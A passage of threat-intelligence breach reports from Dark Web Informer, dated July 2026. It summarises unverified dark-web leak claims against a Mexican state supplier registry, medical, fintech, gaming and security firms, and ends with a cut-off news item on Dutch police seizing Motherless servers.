2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23987592786359827635987235689724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23987592786359827635987235689724.png) ### ⚠Potential impact What distinguishes this claim is that the material is described as **scanned source documents rather than extracted database fields**. An identity number in a table supports fraud; a photographed INE credential alongside CURP, RFC, a professional licence, and a corporate charter is a ready-made identity package that can be submitted directly to institutions that accept document images. Because folders are said to be **indexed by RFC**, the set is also trivially searchable for any specific individual or company rather than requiring bulk processing. The more serious concern is the combination of **home and business address data, photographs of those premises, and two months of financial statements**, held for people who are on record as suppliers to a state government. That is not a fraud profile so much as a targeting profile: it identifies who a business owner is, where they and their premises are, what they look like, and how much money moved through the business recently. **Michoacán has a well-documented and persistent problem with extortion of businesses**, and material of this shape maps directly onto how such targeting is carried out. For affected registrants the exposure is physical as much as financial, and none of it can be undone by changing a credential. The free, unpriced distribution removes any barrier to who obtains it. The claim is unverified. ### iStatus Unverified The post is a leak rather than a sale, with the archive hosted on a public file service and no price attached. Dark Web Informer is **not reproducing the download location**. The listing is credited to two handles operating jointly, and the posting account was **created within the last week** with almost no history, though the specificity of the document inventory and the RFC-indexed folder structure is more detailed than fabricated listings typically manage. Neither the document count nor the archive contents have been independently corroborated. The claim is **unverified** and the Michoacán State Government has not publicly addressed it. Suppliers registered with CADPE may wish to be alert to identity misuse and to unsolicited approaches referencing their business or premises. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Moroccan Medical Provider Distamed Allegedly Breached, Patient Records and 13 Years of Company Archive Claimed URL: https://darkwebinformer.com/moroccan-medical-provider-distamed-allegedly-breached-patient-records-and-13-years-of-company-archive-claimed/ Last updated: 2026-07-24T15:28:28.000Z Breach Report ![Morocco flag](https://flagcdn.com/w40/ma.png)Morocco Healthcare / Medical Devices Data Leaked ## Moroccan Medical Provider Distamed Allegedly Breached, Patient Records and 13 Years of Company Archive Claimed A threat actor posting as **anisanas2** claims to have extracted the full database of **Distamed Morocco**, a supplier of medical devices and healthcare solutions to hospitals, clinics, and practitioners, with a stated focus on cardiology, pulmonology, neurology, sleep diagnostics, rehabilitation, and medical imaging. The post claims the material includes the **complete client list, patient records, internal files, billing documents, invoices, and document scans**, alongside the **full company archive dating to 2013**. The actor further asserts the data covers the company's dealings with government bodies, including **Moroccan military and public hospitals**. Named fields include first and last name, phone number, address, age, date of visit, and **CIN national identity numbers**. No record count or price is stated. The claim is **unverified**. Severity CRITICAL RecordsNot stated RangeBack to 2013 Country![Morocco flag](https://flagcdn.com/w40/ma.png)Morocco Actoranisanas2 ### ▣Post details TargetDistamed Morocco Country![Morocco flag](https://flagcdn.com/w40/ma.png)Morocco SectorHealthcare / Medical devices ListingReply or upgrade to unlock RecordsNot stated DataPatient, client, billing, archive ObservedJul 24, 2026 Actoranisanas2 ### !Allegedly included - Patient records - Full names - CIN national ID numbers - Phone numbers - Home addresses - Age - Date of visit - Full client list - Billing documents - Invoices - Document scans - Internal company files - Government contract dealings - Military hospital records ### ◱Screenshot [ ![Distamed Morocco medical provider database leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8237859629875692837659872658976235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/8237859629875692837659872658976235.png) ### ⚠Potential impact Health data sits in a category of its own because it cannot be reissued, revoked, or meaningfully mitigated after publication. The named fields alone would be serious, since a **CIN pairs with name, address, and phone to form the basis of Moroccan identity verification** and underpins access to banking and government services. What raises this further is that **the provider's specialisms are themselves disclosive**. A patient record held by a supplier concentrated in cardiology, pulmonology, neurology, and sleep diagnostics implies a clinical condition even where no diagnosis field exists, and a date of visit narrows that inference to a point in time. Individuals do not get to opt out of that association once it is public, and the consequences reach into employment, insurance, and family circumstances. The claimed **13-year archive** widens the affected group well beyond current patients to anyone who passed through since 2013\. The assertion that the material covers **military and public hospital dealings** introduces a separate dimension: procurement records, equipment inventories, and facility documentation for military medical infrastructure would carry national security relevance independent of the patient data, and would be of interest to parties with no commercial motive at all. The absence of any stated record count means the scale of exposure cannot be assessed from the post. The claim is unverified. ### iStatus Unverified The post carries no sample data, no record count, and no file listing, offering only a field description behind a reply-or-upgrade gate. That is **notably less substantiation than most listings of comparable claimed scope**, and the breadth of what is asserted, spanning patient records, corporate archives, and government contracts, is not matched by evidence in the post itself. The account is established on the forum with a moderate history and elevated standing, and promotes external contact channels. The opening line suggests a return to activity after a period of absence. None of the claims have been independently corroborated. The claim is **unverified** and Distamed has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### PokemonGym.nl Database Allegedly Leaked, 19,600 Player Accounts and Private Messages Published URL: https://darkwebinformer.com/pokemongym-nl-database-allegedly-leaked-19-600-player-accounts-and-private-messages-published/ Last updated: 2026-07-23T17:13:40.000Z Breach Report ![Netherlands flag](https://flagcdn.com/w40/nl.png)Netherlands Gaming / Online RPG Point-Gated Download ## PokemonGym.nl Database Allegedly Leaked, 19,600 Player Accounts and Private Messages Published A forum user posting as **888** has published what they describe as the database of **PokemonGym.nl**, a Dutch online Pokémon RPG. The post claims the breach occurred in **July 2026** and exposed **19,600 unique users**. The advertised schema covers account, profile, and gameplay tables, including **usernames, email addresses, two IP address fields, age, gender, country, and password hashes**. Separately, the post includes a dump of the platform's **private messaging table with the full text of user-to-user conversations**. The password values shown are **Argon2id hashes**, a modern algorithm that substantially limits recovery. The data is offered behind a forum points paywall. The claim is **unverified**. Severity HIGH Records\~19,600 PasswordsArgon2id Country![Netherlands flag](https://flagcdn.com/w40/nl.png)Netherlands Actor888 ### ▣Post details TargetPokemonGym.nl Country![Netherlands flag](https://flagcdn.com/w40/nl.png)Netherlands SectorGaming / Online RPG ListingPoints to unlock Records\~19,600 unique users DataAccounts, IPs, private messages ObservedJul 23, 2026 Actor888 ### !Allegedly included - Usernames - Email addresses - Argon2id password hashes - Secondary password field - IP addresses (two fields) - Age - Gender - Country - Private message content - Sender & recipient IDs - Message timestamps - Account role & status - Ban reasons & durations - Premium & VIP expiry - Activity & playtime metrics - In-game currency balances ### ◱Screenshots [ ![PokemonGym.nl database leak forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/789236459871264987126659871264987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/789236459871264987126659871264987235.png) [ ![PokemonGym.nl database leak forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/789236459871264987126659871264987236.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/789236459871264987126659871264987236.png) ### ⚠Potential impact The credential exposure here is milder than most gaming leaks. The hashes shown use **Argon2id with high memory and iteration parameters**, which is current best practice and means bulk password recovery is not realistically achievable; the immediate credential-stuffing risk is correspondingly low. That is worth stating plainly, because it is the part of this dataset that was handled well. The exposure that matters is elsewhere. The account table pairs **email address and username with age, gender, country, and two IP addresses**, and the dump extends to the platform's **private message table including full message text**. A fan-made Pokémon RPG draws a user base skewed heavily toward children and teenagers, and the sample conversations are consistent with that. Publishing the private correspondence of that population alongside the identifiers needed to locate and contact them is the central harm here, and it is not one the affected users can remediate: a password can be changed, a past conversation cannot be unpublished. The **combination of approximate location from IP, self-reported age and gender, and an active messaging history** is precisely the material that supports targeted approaches to minors, which places this well above the usual severity of a small gaming breach. The schema also lists a second credential field alongside the hashed one, whose contents and format are not evident from the post. The claim is unverified. ### iStatus Unverified The post includes samples from both the user table and the private message table, and places the download behind a points paywall. Unlike the throwaway accounts behind many listings, this one is **long-established on the forum with a substantial posting history and high standing**, which speaks to the poster's position in that community rather than to the authenticity of the data. Neither the record count nor the dump has been independently corroborated. The claim is **unverified** and PokemonGym.nl has not publicly addressed it. Given the likely age profile of the user base, this is a case where prompt notification to players and their parents would matter more than usual, and players who reused their password elsewhere should change it regardless of the hashing strength. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bolivia's Ministry of Health SSSRO Database Allegedly Leaked, 41,406 Records on Rural Health Interns Published URL: https://darkwebinformer.com/bolivias-ministry-of-health-sssro-database-allegedly-leaked-41-406-records-on-rural-health-interns-published/ Last updated: 2026-07-23T16:20:00.000Z Breach Report ![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia Government / Health Free Download ## Bolivia's Ministry of Health SSSRO Database Allegedly Leaked, 41,406 Records on Rural Health Interns Published A threat actor posting as **konata\_izumi\_shell** claims to have breached a system belonging to Bolivia's **Ministry of Health and Sports** and extracted the complete database behind the **Servicio Social de Salud Rural Obligatorio**, the programme under which health sciences students and graduates carry out mandatory placements in rural and understaffed facilities. The post describes **41,406 records in SQL format** and publishes the full table schema. Fields include **national identity document numbers, dates of birth, full names, personal email addresses and phone numbers**, together with university, degree programme, placement period, academic marks, and the **latitude and longitude of each assigned health establishment**. The database is offered as a free direct download. The claim is **unverified**. Severity CRITICAL Records41,406 PriceFree Country![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia Actorkonata\_izumi\_shell ### ▣Post details TargetMinistry of Health and Sports (SSSRO) Country![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia SectorGovernment / Public health ListingFree direct download Records41,406 FormatSQL dump ObservedJul 23, 2026 Actorkonata\_izumi\_shell ### !Allegedly included - Full names - National ID document numbers - Document type & complement - Dates of birth - Personal email addresses - Phone numbers - University & campus - Degree programme - Academic marks - Placement start & end dates - Assigned health facility - Facility coordinates - Authorisation status - Legal proxy details ### ◱Screenshot [ ![Bolivia Ministry of Health SSSRO database leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/374896590872634576235978623978569782.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/374896590872634576235978623978569782.png) ### ⚠Potential impact The population in this database is narrow and identifiable: **young health sciences students and recent graduates** serving compulsory placements, many of them posted alone to remote facilities. That context changes how the fields should be read. A **national identity number paired with a date of birth and full name** is the core of Bolivian identity verification and cannot be reissued the way a password can, making fraudulent credit applications and impersonation the baseline concern. The more distinctive risk comes from the **facility coordinates**. Combined with placement start and end dates, the data does not merely identify these individuals, it places a named person of known age at a known rural location during a known window. For a cohort that is young, frequently female, and posted away from home support networks, that is a personal safety exposure rather than a purely financial one, and it is not something the affected individuals can mitigate by changing a credential. **Academic marks and authorisation status** add a further layer, since these are education records that were never intended for publication and could affect professional standing. Free distribution compounds all of this, as the dataset can propagate without any purchase step. The claim is unverified. ### iStatus Unverified The post publishes the complete table schema and an example insert statement, and points to an external file host for the download. Dark Web Informer is **not reproducing the download location**. The stated record count is consistent with the scale of a national placement programme, though neither the count nor the authenticity of the dump has been independently corroborated. The account has a short posting history on the forum. The claim is **unverified** and the Ministry of Health and Sports has not publicly addressed it. Individuals who have participated in the programme may wish to watch for identity misuse and treat unsolicited contact referencing their placement or institution with caution. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### B9 Neobank Data Allegedly Scraped, 36,000 Records With Partial SSNs and Dates of Birth Posted URL: https://darkwebinformer.com/b9-neobank-data-allegedly-scraped-36-000-records-with-partial-ssns-and-dates-of-birth-posted/ Last updated: 2026-07-23T15:11:23.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Fintech / Neobank Point-Gated Download ## B9 Neobank Data Allegedly Scraped, 36,000 Records With Partial SSNs and Dates of Birth Posted A forum user posting as **riche** has published what they describe as a database from **Bnine.com**, the platform operated by **B9**, a US neobank offering checking accounts, debit cards, and early direct deposit. The poster states the dataset holds roughly **36,000 users** and describes it as scraped rather than dumped, noting that collection excluded accounts requiring selfie verification and that the remainder could not be reached under current limitations. The advertised sample carries **full names, dates of birth, partial SSN values, home addresses, phone numbers, and email addresses** alongside account status, KYC state, and cash advance limits. The claim is **unverified**. Severity CRITICAL Records\~36,000 MethodClaimed scraping Country![United States flag](https://flagcdn.com/w40/us.png)United States Actorriche ### ▣Post details TargetBnine.com / B9 Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorFintech / Digital banking ListingDownload + mirror, points to unlock Records\~36,000 obtained DataIdentity, KYC, advance limits ObservedJul 23, 2026 Actorriche ### !Allegedly included - Full names - Dates of birth - Partial SSN values - Home addresses & unit numbers - Phone numbers - Email addresses - Account status & closure state - Blocking reasons - KYC verification status - Cash advance limits - Premium tier limits - Payroll & ACH transfer fields ### ◱Screenshot [ ![Bnine.com B9 neobank data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/27839589726348976235987623897598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/27839589726348976235987623897598723.png) ### ⚠Potential impact The field combination here is the concern rather than the volume. **Full name, date of birth, home address, and a partial SSN** is close to the standard input set for US identity verification, and the same four values are what a fraudster needs to open credit in someone else's name or to pass knowledge-based authentication with a bank or carrier. Unlike a password, none of these can be rotated. The financial context sharpens it further: records carry **account status, KYC verification state, and cash advance limits**, which identify not merely who someone banks with but how much credit they can draw and whether their account is already blocked or closing. That is precise targeting material for advance-fee and account-recovery scams aimed at people who may already be under financial pressure. The claimed collection method is worth attention in its own right. If **36,000 records were assembled by scraping rather than by extracting a database**, that would point to an enumerable interface returning full customer records, which is a condition that persists until it is fixed and would leave the remainder of the user base reachable by the same route. The poster's reference to a much larger total user base describes the platform's estimated size, not what was obtained. The claim is unverified. ### iStatus Unverified The post offers a download and mirror behind a forum points paywall and includes a record sample. The poster describes the dataset as partial and explicitly attributes the shortfall to **scraping limits and verification requirements** rather than to a database compromise, a distinction that materially changes what would have gone wrong and has not been corroborated either way. The account has a moderate posting history on the forum. Neither the record count nor the collection method has been independently verified. The claim is **unverified** and B9 has not publicly addressed it. Customers may wish to consider a credit freeze and to treat unsolicited contact referencing their account status or advance limit as suspect. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bebunk Database Allegedly Leaked, 12,324 Banking Customers With IBANs and KYC Records Exposed URL: https://darkwebinformer.com/bebunk-database-allegedly-leaked-12-324-banking-customers-with-ibans-and-kyc-records-exposed/ Last updated: 2026-07-22T16:59:57.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Fintech / Banking Free Download ## Bebunk Database Allegedly Leaked, 12,324 Banking Customers With IBANs and KYC Records Exposed A forum user posting as **kitta** has published what they describe as the database of **Bebunk.com**, a digital financial service offering current accounts and payment cards. The post claims **12,324 unique customers** were exposed. The advertised field list is materially more sensitive than a typical consumer leak, combining identity and contact details with **IBANs, account balances, withdrawal limits, KYC status, and authentication tokens**. Records in the posted sample carry French IBANs, XPF currency values, and New Caledonia locality codes, alongside references to a **third-party banking-as-a-service platform**. The data is offered as a **free download** behind a reply-to-unlock gate. The claim is **unverified**. Severity CRITICAL Records12,324 PriceFree Country![France flag](https://flagcdn.com/w40/fr.png)France Actorkitta ### ▣Post details TargetBebunk.com Country![France flag](https://flagcdn.com/w40/fr.png)France / New Caledonia SectorFintech / Digital banking ListingFree — reply to unlock Records12,324 unique customers DataBanking identifiers, KYC, tokens ObservedJul 22, 2026 Actorkitta ### !Allegedly included - Full names - Email addresses & logins - Phone numbers - IBANs - Account balances - Withdrawal limits - Fee & insufficient balances - KYC status & workflow - KYC tokens - PEP screening status - FATCA reporting status - Account & card status flags - Notification tokens - Platform user identifiers ### ◱Screenshots [ ![Bebunk.com data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/439785t62397865298763598723658972359.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/439785t62397865298763598723658972359.png) [ ![Bebunk.com data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/439785t62397865298763598723658972360.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/439785t62397865298763598723658972360.png) ### ⚠Potential impact Twelve thousand records is small by leak standards, but the per-record value here is unusually high. An **IBAN paired with a verified full name, phone number, and current balance** is close to an ideal input for SEPA direct debit fraud and for social engineering that opens by reciting a customer's own account details back to them. The **KYC and compliance fields compound this**: verification status, workflow state, PEP screening outcomes, and FATCA flags are regulatory data that customers never consented to see published, and PEP status in particular identifies individuals who may already be at elevated risk. The presence of **notification, activation, and KYC tokens** raises a separate question about whether any of those values remain valid, since tokens that have not been rotated since the extraction date could support account access rather than merely describing it. The apparent New Caledonian concentration narrows the exposure to a population of roughly a quarter of a million, meaning a meaningful share of the territory's users of this service may be affected. Signals in the sample also point to a **third-party banking-as-a-service provider** sitting behind the product, which leaves open where in that chain the data originated. The claim is unverified. ### iStatus Unverified This is the **second database posted by the same account today**, following a listing against a US e-commerce platform earlier in the day. The account is recently registered with minimal posting history despite an elevated forum rank. Record timestamps in the sample run into **2026**, which would place the extraction recently rather than in an aged dataset, though timestamps are trivially editable and prove nothing on their own. Neither the record count nor the field structure has been independently corroborated. The claim is **unverified** and Bebunk has not publicly addressed it. Customers of the service may wish to watch for unrecognised direct debits and treat unsolicited contact citing their account details with suspicion. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### RevolutionParts Database Allegedly Leaked, 5.1 Million Customer Records Posted for Free URL: https://darkwebinformer.com/revolutionparts-database-allegedly-leaked-5-1-million-customer-records-posted-for-free/ Last updated: 2026-07-22T16:48:54.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Automotive / E-commerce Free Download ## RevolutionParts Database Allegedly Leaked, 5.1 Million Customer Records Posted for Free A forum user posting as **kitta** has published what they describe as the full database of **RevolutionParts.com**, the e-commerce platform used by automotive dealerships to sell parts online. The post claims the breach occurred in **July 2026** and exposed **5,147,231 unique customers**. The advertised field list combines conventional contact details with **persistent device and browser identifiers**, and a posted sample shows records carrying MD5-hashed email values alongside plaintext ones. The claim is **unverified**. Severity HIGH Records5,147,231 PriceFree Country![United States flag](https://flagcdn.com/w40/us.png)United States Actorkitta ### ▣Post details TargetRevolutionParts.com Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorAutomotive parts e-commerce ListingFree — reply to unlock Records5,147,231 unique customers DataCustomer PII + device identifiers ObservedJul 22, 2026 Actorkitta ### !Allegedly included - Full names - Email addresses - Phone numbers - Street addresses - City, state, ZIP - MD5-hashed emails - Browser IDs - Device IDs - Device brand & model - Device OS & version - MAC addresses - iOS advertising identifiers ### ◱Screenshot [ ![RevolutionParts.com data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/29378528736459273659872635987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/29378528736459273659872635987235.png) ### ⚠Potential impact No passwords or payment data appear in the advertised field list, which limits the immediate account-takeover risk. The more durable problem is the **pairing of real identity with persistent device identifiers**. Names, addresses, and phone numbers can at least be changed under duress; MAC addresses, device IDs, and advertising identifiers tie a named individual to specific hardware in a way that supports long-term tracking and cross-referencing against other leaked corpora. The presence of hashed emails and confidence scoring alongside sparse, unevenly populated fields suggests **marketing enrichment or identity-resolution data** rather than a clean transactional customer table, which would widen the question of whose data this actually is and how it was assembled. For affected individuals the near-term risk is targeted phishing: a caller who knows your name, address, phone, and the fact that you bought parts for a specific vehicle is credible in a way that generic fraud is not. Free distribution matters here too, since nothing has to be purchased for the set to circulate widely. The claim is unverified. ### iStatus Unverified The account is recently registered with minimal posting history despite an elevated forum rank, and the download sits behind a reply gate, a common engagement-farming pattern that does not itself speak to authenticity either way. The record count and field structure have not been independently corroborated. The claim is **unverified** and RevolutionParts has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### RapidFort Allegedly Breached in CanisterWorm Campaign, 569GB Across 48 S3 Buckets Listed for $40,000 URL: https://darkwebinformer.com/rapidfort-allegedly-breached-in-canisterworm-campaign-569gb-across-48-s3-buckets-listed-for-40-000/ Last updated: 2026-07-21T21:07:37.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Technology / Security Vendor Data for Sale ## RapidFort Allegedly Breached in CanisterWorm Campaign, 569GB Across 48 S3 Buckets Listed for $40,000 A threat actor posting as **xpl0itrs** is advertising the sale of data they claim to have taken from **RapidFort**, a US container hardening and software supply chain security vendor. The listing attributes the intrusion to a campaign the poster calls **CanisterWorm**, carried out with a group named **TeamPCP**, and describes **569GB across 140,061 files extracted from 48 S3 buckets**. The seller publishes a detailed bucket-by-bucket manifest covering hardening pipelines, a vulnerability database pipeline said to account for roughly 235GB, scanner backends, DevOps infrastructure, and billing exports, and claims the set contains **plaintext cloud credentials, Kubernetes kubeconfigs, and private keys**. The actor further claims the data dates to **March** and that customers were never notified. The asking price is **$40,000, negotiable**. The claim is **unverified**. Severity CRITICAL Data569GB Files140,061 Price$40,000 Actorxpl0itrs ### ▣Post details TargetRapidFort Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorTechnology / Cybersecurity ListingData for sale — $40k negotiable Volume569GB / 140,061 files Source48 S3 buckets ObservedJul 21, 2026 CampaignCanisterWorm / TeamPCP ### !Allegedly included - Vulnerability DB pipeline (\~235GB) - Image hardening pipelines - AWS credential pairs - Kubernetes kubeconfigs (AKS) - GitLab & PostgreSQL creds - Azure storage account key - RSA and encryption keys - EC2 instance credentials - DoD pipeline & deploy configs - Customer CloudFormation templates - Jenkins build server backups - Redis scanner DB dumps - CloudFront CDN access logs - AWS billing & usage exports ### ◱Screenshots [ ![RapidFort CanisterWorm data breach forum post screenshot, July 2026 (1 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723651.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723651.png) [ ![RapidFort CanisterWorm data breach forum post screenshot, July 2026 (2 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723652.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723652.png) [ ![RapidFort CanisterWorm data breach forum post screenshot, July 2026 (3 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723653.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723653.png) [ ![RapidFort CanisterWorm data breach forum post screenshot, July 2026 (4 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723654.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1239785629873659872635987263589723654.png) ### ⚠Potential impact The concern with a claim like this is not the volume, it is the position the vendor occupies. RapidFort sits inside its customers' build and deployment pipelines, and the manifest describes **per-customer CloudFormation templates that provision cross-account IAM roles** so the platform can scan customer images, snapshots, and volumes. If that material is authentic, the exposure is not confined to one company: it maps trust relationships reaching into every environment that onboarded the scanner. The claimed presence of **plaintext AWS credential pairs, AKS kubeconfigs with service principal auth, database credentials, a full Azure storage account key, and RSA private keys** would compound that, since any still-valid secret is a live path rather than a historical record. The listing also advertises **Department of Defense pipeline automation and deployment manifests**, which would carry its own set of consequences. Separately, the manifest itself is a detailed map of internal architecture, useful to any actor planning a follow-on intrusion whether or not the data ever sells. The claim is unverified. ### iStatus Unverified The post is a sale listing with an unusually granular manifest, offered at a fixed but negotiable price with cryptocurrency and encrypted messenger contact routes, which **Dark Web Informer has withheld**. The seller alleges the data dates to March 2026 and that **no breach notification or customer disclosure has been issued**. That allegation is the seller's own and should be treated as a claim rather than a finding. The claim is **unverified** and RapidFort has not publicly addressed it. Organisations using the platform may wish to review cross-account role trust policies and rotate any credentials shared with or generated for the service. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Dutch Police Seize Motherless Servers in International CSAM and Sexual Abuse Investigation URL: https://darkwebinformer.com/dutch-police-seize-motherless-servers-in-international-csam-and-sexual-abuse-investigation/ Last updated: 2026-07-21T20:02:14.000Z Dutch police have seized servers belonging to the pornographic content-sharing platform Motherless as part of an international investigation into suspected child sexual abuse material and videos allegedly depicting drug-facilitated sexual abuse. The servers were confiscated on July 21 during [raids in Steenbergen, Rotterdam, and Amsterdam](https://www.politie.nl/nieuws/2026/juli/21/08-doorzoekingen-in-onderzoek-naar-website-motherless.html). The operation was conducted by the Zeeland-West-Brabant police cybercrime team under the direction of the Zeeland-West-Brabant Public Prosecution Service. Police said the equipment was owned or used by Motherless and was located at infrastructure belonging to the platform’s hosting provider. The seizures caused the website to become unavailable. ### Servers to Be Examined With Europol Investigators will analyze the data stored on the seized servers in several stages. Specialists from Europol will assist with the examination, while other European police agencies may become involved later in the investigation. The authorities are attempting to identify the people who created, uploaded, or committed the abuse depicted in the suspected illegal material. Police are also conducting a separate examination of [Motherless’ role in hosting and distributing the content](https://nos.nl/artikel/2623879-servers-pornosite-motherless-in-beslag-genomen-bij-politie-inval). Police said evidence connected to the investigation has been obtained from several countries, including the Netherlands, making the case an international inquiry. No arrests were made during the July 21 raids. Authorities said they could not release further details while the investigation remains active. ### Investigation Involves CSAM and Drug-Facilitated Abuse Motherless allows users to upload and download pornographic images and videos. However, authorities say some of the material hosted by the platform may depict serious sexual offenses. The investigation includes suspected [child sexual abuse material and videos of women who may have been drugged before being sexually abused](https://www.politie.nl/nieuws/2026/juli/21/08-doorzoekingen-in-onderzoek-naar-website-motherless.html). Previous media investigations alleged that the platform hosted large amounts of material depicting unconscious or incapacitated women. Some users were also accused of exchanging advice about drugging partners and avoiding detection. Later reporting by Dutch broadcaster NOS alleged that accounts associated with Motherless personnel had themselves [uploaded known child sexual abuse images](https://nos.nl/artikel/2623879-servers-pornosite-motherless-in-beslag-genomen-bij-politie-inval). Motherless previously said it was unaware of the files and requested specific links so that the content could be investigated, removed, and reported. ### Site Previously Taken Offline in May The latest action follows an earlier intervention by Dutch prosecutors in May 2026. The Public Prosecution Service temporarily took Motherless offline after reporting raised concerns about suspected illegal and non-consensual material. The platform returned within weeks after stating that it had removed prohibited files, strengthened upload restrictions, expanded moderation, and closed weaknesses that had been abused by some uploaders. Its Dutch hosting provider, [NFOrce Internet Services, also requested detailed information](https://nforce.com/transparency?case=motherless-07-05-2026) about the platform’s moderation systems, abuse-reporting procedures, historical content reviews, and handling of high-risk material. Motherless said its moderation operation used human reviewers, automated analysis, keyword restrictions, and hash-matching systems. It also claimed that reported content was immediately hidden while awaiting human review. The physical seizure of the servers represents a more substantial investigative step than the temporary disruption in May. Instead of only making the website inaccessible, authorities can now preserve and examine stored files, account information, upload records, moderation activity, and other potentially relevant evidence. ### Investigators Examining Platform’s Role The investigation is not limited to the suspected creators or uploaders of illegal material. Police specifically said the role of Motherless itself will be examined. That could involve determining what 